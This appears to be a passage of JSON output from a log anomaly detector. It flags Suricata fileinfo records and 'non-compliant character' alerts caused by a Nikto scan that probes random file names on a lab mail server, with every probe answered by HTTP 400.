"{\"timestamp\":\"2020-03-04T19:18:34.180404+0000\",\"flow_id\":1759467696471457,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46794,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.org\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.org\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.180404, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": 
"\"flow_id\":1759467696471457,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46794,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.org\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.org\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46794,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.org\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.org\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.org\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, 
"/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.org\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.org", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.org", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", 
"/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46794,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46794, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1759467696471457,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1759467696471457, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": 
[ "{\"timestamp\":\"2020-03-04T19:18:34.180404+0000\",\"flow_id\":1759467696471457,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46794,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.org\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.org\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.181939 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46796 -> 192.168.10.154:80", "/parser/model/time": 1583349514.181939, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 
3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46796, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.181939 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46796 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.dpgs", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.182096+0000\",\"flow_id\":1904689130685302,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46796,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dpgs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dpgs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.182096, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", 
"/parser/model/flow_id": "\"flow_id\":1904689130685302,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46796,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dpgs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dpgs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46796,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dpgs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dpgs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.dpgs\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", 
"/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.dpgs\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.dpgs", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.dpgs", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, 
"/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46796,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46796, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1904689130685302,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1904689130685302, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.182096+0000\",\"flow_id\":1904689130685302,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46796,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.dpgs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.dpgs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.183734 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46798 -> 192.168.10.154:80", "/parser/model/time": 1583349514.183734, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command 
Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46798, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.183734 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46798 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.showsource", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.184027+0000\",\"flow_id\":2212887393913480,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46798,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.showsource\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.showsource\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.184027, 
"/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2212887393913480,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46798,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.showsource\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.showsource\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46798,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.showsource\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.showsource\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.showsource\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": 
"CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.showsource\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.showsource", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.showsource", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, 
"/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46798,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46798, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2212887393913480,", 
"/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2212887393913480, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.184027+0000\",\"flow_id\":2212887393913480,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46798,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.showsource\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.showsource\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.18 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.186320 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46800 -> 192.168.10.154:80", "/parser/model/time": 1583349514.18632, "/parser/model/brack_str1": "] {", "/parser/model/id1": 